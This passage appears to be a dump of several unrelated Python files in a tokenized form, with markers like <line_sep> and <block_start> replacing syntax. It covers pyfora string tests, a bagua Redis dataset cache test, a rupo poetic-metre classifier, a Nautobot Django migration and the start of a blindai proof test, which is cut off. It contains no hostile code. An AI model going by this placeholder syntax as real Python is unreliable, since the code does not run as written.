"pyfora.string_slicing_10mm.2_char_small_string.pyfora")<line_sep>runTest(<lambda>:self.evaluateWithExecutor(f 10000 1000 200) "pyfora.string_slicing_10mm.200_char_small_string.pyfora")<line_sep>sys.setcheckinterval(100000)<line_sep>runTest(<lambda>:f(1000000 10 2) "pyfora.string_slicing_10mm.2_char_large_string.native")<line_sep>runTest(<lambda>:f(1000000 10 200) "pyfora.string_slicing_10mm.200_char_large_string.native")<line_sep>runTest(<lambda>:f(10000 1000 2) "pyfora.string_slicing_10mm.2_char_small_string.native")<line_sep>runTest(<lambda>:f(10000 1000 200) "pyfora.string_slicing_10mm.200_char_small_string.native")<line_sep>sys.setcheckinterval(100)<block_end><def_stmt>test_string_slicing_into_vector self<block_start><def_stmt>testFunction ct passCt chars<block_start>x="asdfasdf"<times>(ct/8)<line_sep>res=0<for_stmt>_ xrange(passCt)<block_start>v=[x[ix<times>chars:ix<times>chars+chars]<for>ix xrange(len(x)/chars)]<for_stmt>e v<block_start>res=res+len(e)<block_end><block_end><return>res<block_end>f=testFunction<line_sep>self.evaluateWithExecutor(f 1000000 1 2)<line_sep>self.evaluateWithExecutor(f 10000 1 2)<def_stmt>runTest func name<block_start>PerformanceTestReporter.PerfTest(name)(func)()<block_end>runTest(<lambda>:self.evaluateWithExecutor(f 1000000 10 2) "pyfora.string_slicing_into_vector_10mm.2_char_large_string.pyfora")<line_sep>runTest(<lambda>:self.evaluateWithExecutor(f 1000000 1000 200) "pyfora.string_slicing_into_vector_10mm.200_char_large_string.pyfora")<line_sep>runTest(<lambda>:self.evaluateWithExecutor(f 10000 1000 2) "pyfora.string_slicing_into_vector_10mm.2_char_small_string.pyfora")<line_sep>runTest(<lambda>:self.evaluateWithExecutor(f 10000 100000 200) "pyfora.string_slicing_into_vector_10mm.200_char_small_string.pyfora")<line_sep>sys.setcheckinterval(100000)<line_sep>runTest(<lambda>:f(1000000 10 2) "pyfora.string_slicing_into_vector_10mm.2_char_large_string.native")<line_sep>runTest(<lambda>:f(1000000 1000 200) "pyfora.string_slicing_into_vector_10mm.200_char_large_string.native")<line_sep>runTest(<lambda>:f(10000 1000 2) "pyfora.string_slicing_into_vector_10mm.2_char_small_string.native")<line_sep>runTest(<lambda>:f(10000 100000 200) "pyfora.string_slicing_into_vector_10mm.200_char_small_string.native")<line_sep>sys.setcheckinterval(100)<block_end><def_stmt>test_string_splitlines self#test a wide variety of strings with combinations of different separators <block_start>stringsToTest=[]<for_stmt>char1 ["" "a"]<block_start>stringsToTest.append(char1)<for_stmt>sep1 ["\n" "\r" "\n\r" "\r\n" "\r\r" "\n\n" "\r\n\r"]<block_start>stringsToTest.append(char1+sep1)<for_stmt>char2 ["" "b"]<block_start>stringsToTest.append(char1+sep1+char2)<for_stmt>sep2 ["\n" "\r" "\n\r" "\r\n" "\r\r" "\n\n" "\r\n\r"]<block_start>stringsToTest.append(char1+sep1+char2+sep2)<block_end><block_end><block_end><block_end><def_stmt>f <block_start>res=[]<for_stmt>shouldSplit [<true> <false>]<block_start><for_stmt>candidate stringsToTest<block_start>res=res+[(candidate candidate.splitlines(shouldSplit))]<block_end><block_end><block_end>self.equivalentEvaluationTest(f)<block_end><def_stmt>test_string_split self#test a wide variety of strings with combinations of different separators <block_start>stringsToTest=["" "a" "aa" "ab" "aba" "aaa" "bbb" "abab" "abc"]<line_sep>sepsToTest=["a" "b"]<def_stmt>f <block_start>res=[]<for_stmt>s stringsToTest<block_start><for_stmt>sep sepsToTest<block_start>res=res+[(s sep s.split(sep))]<block_end><block_end><block_end>self.equivalentEvaluationTest(f)<block_end><def_stmt>test_string_indexing_2 self<block_start><def_stmt>f idx<block_start>x="asdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdf"<line_sep><return>x[idx]<block_end>self.equivalentEvaluationTest(f -1)<line_sep>self.equivalentEvaluationTest(f -2)<line_sep>self.equivalentEvaluationTest(f 0)<line_sep>self.equivalentEvaluationTest(f 1)<block_end><def_stmt>test_string_comparison self<block_start><def_stmt>f <block_start>a="a"<line_sep>b="b"<line_sep>r1=a<l>b<line_sep>r2=a<g>b<line_sep><return>(r1 r2)<block_end>self.equivalentEvaluationTest(f)<block_end><def_stmt>test_string_duplication self<block_start><def_stmt>f <block_start>a="asdf"<line_sep>r1=a<times>20<line_sep>r2=20<times>a<line_sep><return>(r1 r2)<block_end>self.equivalentEvaluationTest(f)<block_end><def_stmt>test_string_equality_methods self<block_start><def_stmt>f <block_start>a="val1"<line_sep>b="val1"<line_sep>r1=a<eq>b<line_sep>r2=a<ne>b<line_sep>a="val2"<line_sep>r3=a<eq>b<line_sep>r4=a<ne>b<line_sep>r5=a.__eq__(b)<line_sep>r6=a.__ne__(b)<line_sep><return>(r1 r2 r3 r4 r5 r6)<block_end>self.equivalentEvaluationTest(f)<block_end><def_stmt>test_large_strings self<block_start><def_stmt>f <block_start>a="val1"<while_stmt>len(a)<l>1000000<block_start>a=a+a<block_end><return>a<block_end>self.equivalentEvaluationTest(f)<block_end><def_stmt>test_define_constant_string self<block_start>x="a string"<with_stmt>self.create_executor()<as>executor<block_start>define_x=executor.define(x)<line_sep>fora_x=define_x.result()<line_sep>self.assertIsNotNone(fora_x)<block_end><block_end><def_stmt>test_compute_string self<block_start><def_stmt>f <block_start><return>"a string"<block_end>remote=self.evaluateWithExecutor(f)<line_sep>self.assertEqual(f() remote)<line_sep>self.assertTrue(isinstance(remote str))<block_end><def_stmt>test_strings_1 self<block_start><def_stmt>f <block_start>x="asdf"<line_sep><return>x<block_end>self.equivalentEvaluationTest(f)<block_end><block_end>
<import_from_stmt>bagua.torch_api.contrib.cached_dataset CachedDataset<import_from_stmt>torch.utils.data.dataset Dataset<import_stmt>numpy<as>np<import_stmt>logging<import_stmt>unittest<import_from_stmt>tests skip_if_cuda_available<line_sep>logging.basicConfig(level=logging.DEBUG)<class_stmt>MyDataset(Dataset)<block_start><def_stmt>__init__ self size<block_start>self.size=size<line_sep>self.dataset=[(np.random.rand(5 2) np.random.rand(1))<for>_ range(size)]<block_end><def_stmt>__getitem__ self item<block_start><return>self.dataset[item]<block_end><def_stmt>__len__ self<block_start><return>self.size<block_end><block_end><class_stmt>TestCacheDataset(unittest.TestCase)<block_start><def_stmt>check_dataset self dataset cache_dataset<block_start><for_stmt>_ range(10)<block_start><for_stmt>_,_ enumerate(cache_dataset)<block_start><pass><block_end><block_end><for_stmt>i range(len(dataset))<block_start>self.assertTrue((dataset[i][0]<eq>cache_dataset[i][0]).all())<line_sep>self.assertTrue((dataset[i][1]<eq>cache_dataset[i][1]).all())<block_end><block_end>@skip_if_cuda_available()<def_stmt>test_redis self<block_start>dataset1=MyDataset(102)<line_sep>dataset2=MyDataset(102)<line_sep>cache_dataset1=CachedDataset(dataset1 backend="redis" dataset_name="d1" )<line_sep>cache_dataset2=CachedDataset(dataset2 backend="redis" dataset_name="d2" )<line_sep>cache_dataset1.cache_loader.store.clear()<line_sep>self.check_dataset(dataset1 cache_dataset1)<line_sep>self.assertEqual(cache_dataset1.cache_loader.num_keys() len(dataset1))<line_sep>self.check_dataset(dataset2 cache_dataset2)<line_sep>self.assertEqual(cache_dataset2.cache_loader.num_keys() len(dataset1)+len(dataset2))<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end>
# -*- coding: utf-8 -*- # Автор: <NAME> # Описание: Классификатор метра. <import_from_stmt>collections OrderedDict<import_from_stmt>typing List Dict Tuple<import_stmt>jsonpickle<import_stmt>logging<import_from_stmt>rupo.main.markup Line Markup<import_from_stmt>rupo.util.mixins CommonMixin<import_from_stmt>rupo.metre.pattern_analyzer PatternAnalyzer<import_from_stmt>rupo.util.preprocess get_first_vowel_position<import_from_stmt>rupo.util.timeit timeit<class_stmt>StressCorrection(CommonMixin)<block_start>""" Исправление ударения. """<def_stmt>__init__ self line_number:int word_number:int syllable_number:int word_text:str stress:int<arrow><none><block_start>""" :param line_number: номер строки. :param word_number: номер слова. :param syllable_number: номер слога. :param word_text: текст слова. :param stress: позиция ударения (с 0). """<line_sep>self.line_number=line_number<line_sep>self.word_number=word_number<line_sep>self.syllable_number=syllable_number<line_sep>self.word_text=word_text<line_sep>self.stress=stress<block_end><block_end><class_stmt>ClassificationResult(CommonMixin)<block_start>""" Результат классификации стихотворения по метру. """<def_stmt>__init__ self count_lines:int=0<arrow><none><block_start>""" :param count_lines: количество строк. """<line_sep>self.metre=<none><line_sep>self.count_lines=count_lines<line_sep>self.errors_count={k:0<for>k MetreClassifier.metres.keys()}# type: Dict[str, int] self.corrections={k:[]<for>k MetreClassifier.metres.keys()}# type: Dict[str, List[StressCorrection]] self.resolutions={k:[]<for>k MetreClassifier.metres.keys()}# type: Dict[str, List[StressCorrection]] self.additions={k:[]<for>k MetreClassifier.metres.keys()}<block_end># type: Dict[str, List[StressCorrection]] <def_stmt>get_metre_errors_count self<block_start>""" :return: получить количество ошибок на заданном метре. """<line_sep><return>self.errors_count[self.metre]<block_end><def_stmt>to_json self<block_start>""" :return: сериализация в json. """<line_sep><return>jsonpickle.encode(self)<block_end>@staticmethod<def_stmt>str_corrections collection:List[StressCorrection]<arrow>str<block_start>""" :param collection: список исправлений. :return: его строковое представление. """<line_sep><return>"\n".join([str((item.word_text item.syllable_number))<for>item collection])<block_end><def_stmt>__str__ self<block_start>st="Метр: "+str(self.metre)+"\n"<line_sep>st<augadd>"Снятая омография: \n"+ClassificationResult.str_corrections(self.resolutions[self.metre])+"\n"<line_sep>st<augadd>"Неправильные ударения: \n"+ClassificationResult.str_corrections(self.corrections[self.metre])+"\n"<line_sep>st<augadd>"Новые ударения: \n"+ClassificationResult.str_corrections(self.additions[self.metre])+"\n"<line_sep><return>st<block_end><block_end><class_stmt>ErrorsTableRecord<block_start><def_stmt>__init__ self strong_errors weak_errors pattern failed=<false><block_start>self.strong_errors=strong_errors<line_sep>self.weak_errors=weak_errors<line_sep>self.pattern=pattern<line_sep>self.failed=failed<block_end><def_stmt>__str__ self<block_start><return>self.pattern+" "+str(self.strong_errors)+" "+str(self.weak_errors)<block_end><def_stmt>__repr__ self<block_start><return>self.__str__()<block_end><block_end><class_stmt>ErrorsTable<block_start><def_stmt>__init__ self num_lines<block_start>self.data={}<line_sep>self.num_lines=num_lines<line_sep>self.coef=OrderedDict([("iambos" 0.3) ("choreios" 0.3) ("daktylos" 0.4) ("amphibrachys" 0.4) ("anapaistos" 0.4) ("dolnik3" 0.5) ("dolnik2" 0.5) ("taktovik3" 6.0) ("taktovik2" 6.0)])<line_sep>self.sum_coef=OrderedDict([("iambos" 0.0) ("choreios" 0.0) ("daktylos" 0.0) ("amphibrachys" 0.0) ("anapaistos" 0.0) ("dolnik3" 0.035) ("dolnik2" 0.035) ("taktovik3" 0.10) ("taktovik2" 0.10)])<for_stmt>metre_name MetreClassifier.metres.keys()<block_start>self.data[metre_name]=[ErrorsTableRecord(0 0 "")<for>_ range(num_lines)]<block_end><block_end><def_stmt>add_record self metre_name line_num strong_errors weak_errors pattern failed=<false><block_start>self.data[metre_name][line_num]=ErrorsTableRecord(strong_errors weak_errors pattern failed)<block_end><def_stmt>get_best_metre self<block_start><for_stmt>l range(self.num_lines)<block_start>strong_sum=0<line_sep>weak_sum=0<for_stmt>metre_name self.data.keys()<block_start>strong_sum<augadd>self.data[metre_name][l].strong_errors<line_sep>weak_sum<augadd>self.data[metre_name][l].weak_errors<block_end><for_stmt>metre_name,column self.data.items()<block_start><if_stmt>strong_sum<ne>0<block_start>column[l].strong_errors=column[l].strong_errors/float(strong_sum)<block_end><if_stmt>weak_sum<ne>0<block_start>column[l].weak_errors=column[l].weak_errors/float(weak_sum)<block_end><block_end><block_end>sums=dict()<for_stmt>metre_name self.data.keys()<block_start>sums[metre_name]=(0 0)<block_end><for_stmt>metre_name,column self.data.items()<block_start>strong_sum=0<line_sep>weak_sum=0<for_stmt>l range(self.num_lines)<block_start>strong_sum<augadd>column[l].strong_errors<line_sep>weak_sum<augadd>column[l].weak_errors<block_end>sums[metre_name]=(strong_sum weak_sum)<block_end><for_stmt>metre_name,pair sums.items()<block_start>sums[metre_name]=self.sum_coef[metre_name]+(pair[0]+pair[1]/2.0)<times>self.coef[metre_name]/self.num_lines<block_end>logging.debug(sums)<line_sep><return>min(sums key=sums.get)<block_end><block_end><class_stmt>MetreClassifier(object)<block_start>""" Классификатор, считает отклонения от стандартных шаблонов ритма(метров). """<line_sep>metres=OrderedDict([("iambos" '(us)*(uS)(U)?(U)?') ("choreios" '(su)*(S)(U)?(U)?') ("daktylos" '(suu)*(S)(U)?(U)?') ("amphibrachys" '(usu)*(uS)(U)?(U)?') ("anapaistos" '(uus)*(uuS)(U)?(U)?') ("dolnik3" '(u)?(u)?((su)(u)?)*(S)(U)?(U)?') ("dolnik2" '(u)?(u)?((s)(u)?)*(S)(U)?(U)?') ("taktovik3" '(u)?(u)?((su)(u)?(u)?)*(S)(U)?(U)?') ("taktovik2" '(u)?(u)?((s)(u)?(u)?)*(S)(U)?(U)?')])<line_sep>border_syllables_count=20<line_sep>@staticmethod@timeit<def_stmt>classify_metre markup<block_start>""" Классифицируем стихотворный метр. :param markup: разметка. :return: результат классификации. """<line_sep>result=ClassificationResult(len(markup.lines))<line_sep>num_lines=len(markup.lines)<line_sep>errors_table=ErrorsTable(num_lines)<for_stmt>l,line enumerate(markup.lines)<block_start><for_stmt>metre_name,metre_pattern MetreClassifier.metres.items()<block_start>line_syllables_count=sum([len(word.syllables)<for>word line.words])<line_sep># Строчки длиной больше border_syllables_count слогов не обрабатываем. <if_stmt>line_syllables_count<g>MetreClassifier.border_syllables_count<or>line_syllables_count<eq>0<block_start><continue><block_end>error_border=7<if_stmt>metre_name<eq>"dolnik2"<or>metre_name<eq>"dolnik3"<block_start>error_border=3<block_end><if_stmt>metre_name<eq>"taktovik2"<or>metre_name<eq>"taktovik3"<block_start>error_border=2<block_end>pattern,strong_errors,weak_errors,analysis_errored=PatternAnalyzer.count_errors(MetreClassifier.metres[metre_name] MetreClassifier.__get_line_pattern(line) error_border)<if_stmt>analysis_errored<or>len(pattern)<eq>0<block_start>errors_table.add_record(metre_name l strong_errors weak_errors pattern <true>)<line_sep><continue><block_end>corrections=MetreClassifier.__get_line_pattern_matching_corrections(line l pattern)[0]<line_sep>accentuation_errors=len(corrections)<line_sep>strong_errors<augadd>accentuation_errors<line_sep>errors_table.add_record(metre_name l strong_errors weak_errors pattern)<block_end><block_end>result.metre=errors_table.get_best_metre()<line_sep># Запомним все исправления. <for_stmt>l,line enumerate(markup.lines)<block_start>pattern=errors_table.data[result.metre][l].pattern<line_sep>failed=errors_table.data[result.metre][l].failed<if_stmt>failed<or>len(pattern)<eq>0<block_start><continue><block_end>corrections,resolutions,additions=MetreClassifier.__get_line_pattern_matching_corrections(line l pattern)<line_sep>result.corrections[result.metre]<augadd>corrections<line_sep>result.resolutions[result.metre]<augadd>resolutions<line_sep>result.additions[result.metre]<augadd>additions<line_sep>result.errors_count[result.metre]<augadd>len(corrections)<block_end><return>result<block_end>@staticmethod<def_stmt>__get_line_pattern line:Line<arrow>str<block_start>""" Сопоставляем строку шаблону, считаем ошибки. :param line: строка. :return: количество ошибок """<line_sep>pattern=""<for_stmt>w,word enumerate(line.words)<block_start><if_stmt>len(word.syllables)<eq>0<block_start>pattern<augadd>"U"<block_end><else_stmt><block_start><for_stmt>syllable word.syllables<block_start><if_stmt>syllable.stress<ne>-1<block_start>pattern<augadd>"S"<block_end><else_stmt><block_start>pattern<augadd>"U"<block_end><block_end><block_end><block_end><return>pattern<block_end>@staticmethod<def_stmt>__get_line_pattern_matching_corrections line:Line line_number:int pattern:str<arrow>Tuple[List[StressCorrection] List[StressCorrection] List[StressCorrection]]<block_start>""" Ударения могут приходиться на слабое место, если безударный слог того же слова не попадает на икт. Иначе - ошибка. :param line: строка. :param line_number: номер строки. :param pattern: шаблон. :return: ошибки, дополнения и снятия """<line_sep>corrections=[]<line_sep>resolutions=[]<line_sep>additions=[]<line_sep>number_in_pattern=0<for_stmt>w,word enumerate(line.words)# Игнорируем слова длиной меньше 2 слогов. <block_start><if_stmt>len(word.syllables)<eq>0<block_start><continue><block_end><if_stmt>len(word.syllables)<eq>1<block_start><if_stmt>pattern[number_in_pattern].lower()<eq>"s"<and>word.syllables[0].stress<eq>-1<block_start>additions.append(StressCorrection(line_number w 0 word.text word.syllables[0].vowel()))<block_end>number_in_pattern<augadd>len(word.syllables)<line_sep><continue><block_end>stress_count=word.count_stresses()<for_stmt>syllable word.syllables<block_start><if_stmt>stress_count<eq>0<and>pattern[number_in_pattern].lower()<eq>"s"# Ударений нет, ставим такое, какое подходит по метру. Возможно несколько. <block_start>additions.append(StressCorrection(line_number w syllable.number word.text syllable.vowel()))<block_end><elif_stmt>pattern[number_in_pattern].lower()<eq>"u"<and>syllable.stress<ne>-1# Ударение есть и оно падает на этот слог, при этом в шаблоне безударная позиция. # Найдём такой слог, у которого в шаблоне ударная позиция. Это и есть наше исправление. <block_start><for_stmt>other_syllable word.syllables<block_start>other_number_in_pattern=other_syllable.number-syllable.number+number_in_pattern<if_stmt>syllable.number<eq>other_syllable.number<or>pattern[other_number_in_pattern].lower()<ne>"s"<block_start><continue><block_end>ac=StressCorrection(line_number w other_syllable.number word.text other_syllable.vowel())<if_stmt>stress_count<eq>1<and>other_syllable.stress<eq>-1<block_start>corrections.append(ac)<block_end><else_stmt><block_start>resolutions.append(ac)<block_end><block_end><block_end>number_in_pattern<augadd>1<block_end><block_end><return>corrections resolutions additions<block_end>@staticmethod<def_stmt>get_improved_markup markup:Markup result:ClassificationResult<arrow>Markup<block_start>""" Улучшаем разметку после классификации метра. :param markup: начальная разметка. :param result: результат классификации. :return: улучшенная разметка. """<for_stmt>pos result.corrections[result.metre]+result.resolutions[result.metre]<block_start>syllables=markup.lines[pos.line_number].words[pos.word_number].syllables<for_stmt>i,syllable enumerate(syllables)<block_start>syllable.stress=-1<if_stmt>syllable.number<eq>pos.syllable_number<block_start>syllable.stress=syllable.begin+get_first_vowel_position(syllable.text)<block_end><block_end><block_end><for_stmt>pos result.additions[result.metre]<block_start>syllable=markup.lines[pos.line_number].words[pos.word_number].syllables[pos.syllable_number]<line_sep>syllable.stress=syllable.begin+get_first_vowel_position(syllable.text)<block_end><return>markup<block_end>@staticmethod<def_stmt>improve_markup markup:Markup<arrow>Tuple[Markup ClassificationResult]<block_start>""" Улучшение разметки метрическим классификатором. :param markup: начальная разметка. """<line_sep>result=MetreClassifier.classify_metre(markup)<line_sep>improved_markup=MetreClassifier.get_improved_markup(markup result)<line_sep><return>improved_markup result<block_end><block_end>
# Generated by Django 3.1.7 on 2021-04-01 06:35 <import_from_stmt>django.conf settings<import_from_stmt>django.db migrations models<import_stmt>django.db.models.deletion<import_stmt>mptt.fields<import_stmt>nautobot.extras.models.statuses<import_stmt>taggit.managers<class_stmt>Migration(migrations.Migration)<block_start>initial=<true><line_sep>dependencies=[("contenttypes" "0002_remove_content_type_name") migrations.swappable_dependency(settings.AUTH_USER_MODEL) ("tenancy" "0001_initial") ("extras" "0001_initial_part_1") ("dcim" "0002_initial_part_2") ("ipam" "0001_initial_part_1") ]<line_sep>operations=[migrations.AddField(model_name="rackreservation" name="user" field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT to=settings.AUTH_USER_MODEL) ) migrations.AddField(model_name="rackgroup" name="parent" field=mptt.fields.TreeForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.CASCADE related_name="children" to="dcim.rackgroup" ) ) migrations.AddField(model_name="rackgroup" name="site" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="rack_groups" to="dcim.site") ) migrations.AddField(model_name="rack" name="group" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="racks" to="dcim.rackgroup" ) ) migrations.AddField(model_name="rack" name="role" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.PROTECT related_name="racks" to="dcim.rackrole" ) ) migrations.AddField(model_name="rack" name="site" field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT related_name="racks" to="dcim.site") ) migrations.AddField(model_name="rack" name="status" field=nautobot.extras.models.statuses.StatusField(null=<true> on_delete=django.db.models.deletion.PROTECT related_name="dcim_rack_related" to="extras.status" ) ) migrations.AddField(model_name="rack" name="tags" field=taggit.managers.TaggableManager(through="extras.TaggedItem" to="extras.Tag") ) migrations.AddField(model_name="rack" name="tenant" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.PROTECT related_name="racks" to="tenancy.tenant" ) ) migrations.AddField(model_name="powerporttemplate" name="device_type" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="powerporttemplates" to="dcim.devicetype") ) migrations.AddField(model_name="powerport" name="_cable_peer_type" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="+" to="contenttypes.contenttype" ) ) migrations.AddField(model_name="powerport" name="_path" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL to="dcim.cablepath") ) migrations.AddField(model_name="powerport" name="cable" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="+" to="dcim.cable") ) migrations.AddField(model_name="powerport" name="device" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="powerports" to="dcim.device") ) migrations.AddField(model_name="powerport" name="tags" field=taggit.managers.TaggableManager(through="extras.TaggedItem" to="extras.Tag") ) migrations.AddField(model_name="powerpanel" name="rack_group" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.PROTECT to="dcim.rackgroup") ) migrations.AddField(model_name="powerpanel" name="site" field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT to="dcim.site") ) migrations.AddField(model_name="powerpanel" name="tags" field=taggit.managers.TaggableManager(through="extras.TaggedItem" to="extras.Tag") ) migrations.AddField(model_name="poweroutlettemplate" name="device_type" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="poweroutlettemplates" to="dcim.devicetype") ) migrations.AddField(model_name="poweroutlettemplate" name="power_port" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="poweroutlet_templates" to="dcim.powerporttemplate" ) ) migrations.AddField(model_name="poweroutlet" name="_cable_peer_type" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="+" to="contenttypes.contenttype" ) ) migrations.AddField(model_name="poweroutlet" name="_path" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL to="dcim.cablepath") ) migrations.AddField(model_name="poweroutlet" name="cable" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="+" to="dcim.cable") ) migrations.AddField(model_name="poweroutlet" name="device" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="poweroutlets" to="dcim.device") ) migrations.AddField(model_name="poweroutlet" name="power_port" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="poweroutlets" to="dcim.powerport" ) ) migrations.AddField(model_name="poweroutlet" name="tags" field=taggit.managers.TaggableManager(through="extras.TaggedItem" to="extras.Tag") ) migrations.AddField(model_name="powerfeed" name="_cable_peer_type" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="+" to="contenttypes.contenttype" ) ) migrations.AddField(model_name="powerfeed" name="_path" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL to="dcim.cablepath") ) migrations.AddField(model_name="powerfeed" name="cable" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="+" to="dcim.cable") ) migrations.AddField(model_name="powerfeed" name="power_panel" field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT related_name="powerfeeds" to="dcim.powerpanel") ) migrations.AddField(model_name="powerfeed" name="rack" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.PROTECT to="dcim.rack") ) migrations.AddField(model_name="powerfeed" name="status" field=nautobot.extras.models.statuses.StatusField(null=<true> on_delete=django.db.models.deletion.PROTECT related_name="dcim_powerfeed_related" to="extras.status" ) ) migrations.AddField(model_name="powerfeed" name="tags" field=taggit.managers.TaggableManager(through="extras.TaggedItem" to="extras.Tag") ) migrations.AddField(model_name="platform" name="manufacturer" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.PROTECT related_name="platforms" to="dcim.manufacturer" ) ) migrations.AddField(model_name="inventoryitem" name="device" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="inventoryitems" to="dcim.device") ) migrations.AddField(model_name="inventoryitem" name="manufacturer" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.PROTECT related_name="inventory_items" to="dcim.manufacturer" ) ) migrations.AddField(model_name="inventoryitem" name="parent" field=mptt.fields.TreeForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.CASCADE related_name="child_items" to="dcim.inventoryitem" ) ) migrations.AddField(model_name="inventoryitem" name="tags" field=taggit.managers.TaggableManager(through="extras.TaggedItem" to="extras.Tag") ) migrations.AddField(model_name="interfacetemplate" name="device_type" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="interfacetemplates" to="dcim.devicetype") ) migrations.AddField(model_name="interface" name="_cable_peer_type" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="+" to="contenttypes.contenttype" ) ) migrations.AddField(model_name="interface" name="_path" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL to="dcim.cablepath") ) migrations.AddField(model_name="interface" name="cable" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="+" to="dcim.cable") ) migrations.AddField(model_name="interface" name="device" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="interfaces" to="dcim.device") ) migrations.AddField(model_name="interface" name="lag" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="member_interfaces" to="dcim.interface" ) ) migrations.AddField(model_name="interface" name="tagged_vlans" field=models.ManyToManyField(blank=<true> related_name="interfaces_as_tagged" to="ipam.VLAN") ) migrations.AddField(model_name="interface" name="tags" field=taggit.managers.TaggableManager(through="extras.TaggedItem" to="extras.Tag") ) migrations.AddField(model_name="interface" name="untagged_vlan" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="interfaces_as_untagged" to="ipam.vlan" ) ) migrations.AddField(model_name="frontporttemplate" name="device_type" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="frontporttemplates" to="dcim.devicetype") ) migrations.AddField(model_name="frontporttemplate" name="rear_port" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="frontport_templates" to="dcim.rearporttemplate" ) ) migrations.AddField(model_name="frontport" name="_cable_peer_type" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="+" to="contenttypes.contenttype" ) ) migrations.AddField(model_name="frontport" name="cable" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="+" to="dcim.cable") ) migrations.AddField(model_name="frontport" name="device" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="frontports" to="dcim.device") ) migrations.AddField(model_name="frontport" name="rear_port" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="frontports" to="dcim.rearport") ) migrations.AddField(model_name="frontport" name="tags" field=taggit.managers.TaggableManager(through="extras.TaggedItem" to="extras.Tag") ) migrations.AddField(model_name="devicetype" name="manufacturer" field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT related_name="device_types" to="dcim.manufacturer") ) migrations.AddField(model_name="devicetype" name="tags" field=taggit.managers.TaggableManager(through="extras.TaggedItem" to="extras.Tag") ) migrations.AddField(model_name="devicebaytemplate" name="device_type" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="devicebaytemplates" to="dcim.devicetype") ) migrations.AddField(model_name="devicebay" name="device" field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="devicebays" to="dcim.device") ) migrations.AddField(model_name="devicebay" name="installed_device" field=models.OneToOneField(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name="parent_bay" to="dcim.device" ) ) migrations.AddField(model_name="devicebay" name="tags" field=taggit.managers.TaggableManager(through="extras.TaggedItem" to="extras.Tag") ) ]<block_end>
<import_from_stmt>copy deepcopy<import_from_stmt>hashlib sha256<import_stmt>os<import_stmt>unittest<import_from_stmt>google.protobuf.timestamp_pb2 Timestamp<import_from_stmt>blindai.pb.securedexchange_pb2 Payload <import_from_stmt>blindai.client RunModelResponse UploadModelResponse <import_from_stmt>blindai.dcap_attestation Policy<import_from_stmt>blindai.utils.errors SignatureError AttestationError<import_from_stmt>.covidnet get_input get_model<line_sep>exec_run=os.path.join(os.path.dirname(__file__) "exec_run.proof")<line_sep>exec_upload=os.path.join(os.path.dirname(__file__) "exec_upload.proof")<line_sep>tmp_path=os.path.join(os.path.dirname(__file__) "tmp_exec.proof")<line_sep>policy_file=os.path.join(os.path.dirname(__file__) "policy.toml")<class_stmt>TestProof(unittest.TestCase)<block_start><def_stmt>test_parse_run self<block_start>response=RunModelResponse()<line_sep>response.load_from_file(exec_run)<line_sep>self.assertTrue(response.is_signed())<line_sep>response2=RunModelResponse()<with_stmt>open(exec_run "rb")<as>file<block_start>response2.load_from_bytes(file.read())<block_end>self.assertEqual(response.payload response2.payload)<line_sep>self.assertEqual(response.signature 